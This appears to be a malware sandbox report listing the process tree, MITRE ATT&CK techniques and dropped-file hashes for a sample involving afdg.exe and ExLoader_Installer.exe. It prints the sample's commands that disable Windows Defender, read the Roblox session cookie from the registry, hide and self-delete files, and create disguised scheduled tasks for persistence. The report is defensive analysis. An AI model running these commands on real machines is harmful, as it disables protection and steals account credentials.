        PID:4660
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        27⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xkGYwzkQoc.bat"
        28⤵
        
        PID:2608
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        29⤵
        
        PID:3404
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        29⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2740
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\evbbIz777a.bat"
        30⤵
        
        PID:1988
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        31⤵
        
        PID:1444
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        31⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YzNOjOTGFC.bat"
        32⤵
        
        PID:4556
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        33⤵
        
        PID:2384
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        33⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jFXOGCU6Cq.bat"
        34⤵
        
        PID:2352
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        35⤵
        
        PID:2244
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        35⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4948
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1n8esAjYxK.bat"
        36⤵
        
        PID:748
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        37⤵
        
        PID:4300
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        37⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1776
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0WHmS6dpJ0.bat"
        38⤵
        
        PID:4984
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        39⤵
        
        PID:3800
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        39⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jddtUB3Qwl.bat"
        40⤵
        
        PID:3208
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        41⤵
        
        PID:680
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        41⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1292
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wUBsuxMZs4.bat"
        42⤵
        
        PID:4524
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        43⤵
        
        PID:480
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        43⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3000
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q2cXKRfm9B.bat"
        44⤵
        
        PID:4624
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        45⤵
        
        PID:1424
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        45⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2168
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LdHmevWlG3.bat"
        46⤵
        
        PID:4548
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        47⤵
        
        PID:436
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        47⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:644
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NYP5fOsMgV.bat"
        48⤵
        
        PID:2128
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        49⤵
        
        PID:1164
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        49⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4552
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KOC6cu7vKW.bat"
        50⤵
        
        PID:3204
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        51⤵
        
        PID:2880
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        51⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4416
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yQDva2PSBr.bat"
        52⤵
        
        PID:2528
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        53⤵
        
        PID:3600
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        53⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CSN9cxKiet.bat"
        54⤵
        
        PID:2192
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        55⤵
        
        PID:4768
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        55⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3488
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\U1yQEvZAPO.bat"
        56⤵
        
        PID:1336
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        57⤵
        
        PID:4484
- C:\Users\Admin\AppData\Local\Temp\afdg.exe
  "C:\Users\Admin\AppData\Local\Temp\afdg.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2940
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3556
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\afdg.exe"
    3⤵
    - Views/modifies file attributes
    PID:740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\afdg.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2768
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2124
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2604
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2460
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\afdg.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:960
- C:\Users\Admin\AppData\Local\Temp\ExLoader_Installer.exe
  "C:\Users\Admin\AppData\Local\Temp\ExLoader_Installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:2312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Perfnet\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Perfnet\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Perfnet\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Perfnet\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Perfnet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Perfnet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2268

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Perfnet\Registry.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Perfnet\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Perfnet\Registry.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Videos\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Public\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ExLoader_InstallerE" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\ExLoader_Installer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ExLoader_Installer" /sc ONLOGON /tr "'C:\Users\Default User\ExLoader_Installer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ExLoader_InstallerE" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\ExLoader_Installer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Vss\Writers\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\Vss\Writers\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Pictures\Saved Pictures\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Saved Pictures\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Pictures\Saved Pictures\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Cookies\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default\Cookies\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Cookies\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ExLoader_InstallerE" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\ExLoader_Installer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ExLoader_Installer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ExLoader_Installer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ExLoader_InstallerE" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\ExLoader_Installer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\Default\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Default\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4308

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Perfnet\6BXg6z.bat

Filesize
31B

MD5
3076d7d9c9deac080fbfcd12e945f009

SHA1
133d81d6216447dadb8d059e5df0bfa2df859ba4

SHA256
9333737accaf07c57f50d70be7b06c4c60fad33035c71112dcc610fbc8913440

SHA512
4efadeee2b208cf938edffaaef5fedfd0f0011761ae138d314f6c3ced3561efff10a68db458d1c356e7ade7e06dff524c72bd7cc19f9a5858699f7c9c3479b21

Download Submit
C:\Perfnet\WebSessionhost.exe

Filesize
1.2MB

MD5
40b198e7b7da71056b8972df9c95024f

SHA1
76dd178bb42182fb76e8aa7e3fbb30457f195397

SHA256
29343e96342523dd16e657266758de5d584ce53510fce30c303e062e670a79cf

SHA512
1803afb1e091899912419f46c46ee187ed3e863294d5948c3d6a2d41107e393927f9bb512c74c36d7230d80909ffdb9ff20592527ce1dc04d31695af0d014ef6

Download Submit
C:\Perfnet\pcwfnmokkxtJ3Iyb.vbe

Filesize
190B

MD5
adf6d6e4a70236f9b1dc8091a11b4f35

SHA1
5d8806d907a881cec768e8175c40ed83dcc5f794

SHA256
c248e5c444ee9f19482070f3abee66c52862e5edaf02899d58dd8d7e7e06beeb

SHA512
411be798e4de069f2941c863738d170ff22a6377bed8ea5900abe7def8ecf55fd851e9e00c6cccd93b7c98fc07efe2306b277c69baaf2cbaa29f1110cb01bd2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Filesize
1KB

MD5
3aac0e4fd743749f96ad00fc6c414e45

SHA1
818139805b91d65e33b31de1d5c58054ce450925

SHA256
bec0ab4eb37381f22befc0da26d55243fd4119274568d2d310f0d869beb4c31c

SHA512
e75398d42017e3dabe2d2acb9fafd249f1dfcee7e6654107bafc777c19cc5a2f8e403c3eb1e6af83fb04d6600c67635ea51c7a4b1eff86f3ff3c364a98c635b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6bddc96a32b9ed8fc70b141ccf4a39b2

SHA1
0f33c0699da40a5eadcec646791cf21cdb0dd7c6

SHA256
cb3853abe77eb0da8a1caccb49e97a573b6f35570722eb759116a645d724c132

SHA512
e41f1597b4129b759e4199db195df1c24e47cc47dc9850fab2d48e44bc3d37dc3658fbfbb62332a0b93c552587d7fab09de1634f605faa2209b8470c2a6eaca6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9db2bc0a0bdfa296036c380393d879e6

SHA1
671288bb74f568effac2199c9213cf7e23a31ef9

SHA256
cce5cc392ad9a82edd35129076da6bb2c3ebe85e158efef8ee7740e9e722c678

SHA512
a1331966d5669c465ccbfbb588d8e09d295aba56be1e0bc895966da28916bdfb2e3333e24f48a54c68f3c3af0f78ec70cea1e07ec2e2647e154d7dfc4d412fc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1Gu59oh2IN.bat

Filesize
205B

MD5
be577b8ecd69d7b94dbb8bff71d8361f

SHA1
85c01f855b4a46e0a79fccbf80152abd7a81f7bf

SHA256
f9a3bc228f9ea45672e26e972384bb200ba2b8446e05e14fb217b31a28cfb142

SHA512
2b7c33d5d307bb18ce912d2729655a4e0290d2409265b7fa3938bbd086c68b1fcc0e0aaeda98282dcedba073ad644c1be08b988a50e603fe02a0c5362854eee4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Db0hEHdXHW.bat

Filesize
205B

MD5
c37073f969ef4b6262bee68e84c84c71

SHA1
0e5ea7faad189df11a3c5cb0a77dc9c601d46985

SHA256
2d91f884bc2b42f3cad12430b0f628fabcd0cfeaf51d5935c17527ffa36abfb2

SHA512
348eb4403f3bed305c1a470a9ae0a3e915f01ddb6ace8c9bc1ed3c0a783aa81610c30493b56a5a0cefef6525da52d5e88386ddfec424280cce53552732794771

Download Submit
C:\Users\Admin\AppData\Local\Temp\ExLoader_Installer.exe

Filesize
21.5MB

MD5
01deeaf6a3ac4ecea37fd6f21c3ea66a

SHA1
2767ec1e576b7639c38b3d75bca5a99146ffda95

SHA256
fae28755d742035f89e0cf73e9c46c7b7c2b625b3dcfab379dc135b9fa79dbb9

SHA512
d6e959987be4f69a890fa1ba62700ae5f7612e0a4919e58491bbdc96f60ebfbf5fe34806a2413b5724459576ab96e007d8edfe393ea9d12bf003f0df9e5fc9fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\GydMm7ZmZe.bat

Filesize
205B

MD5
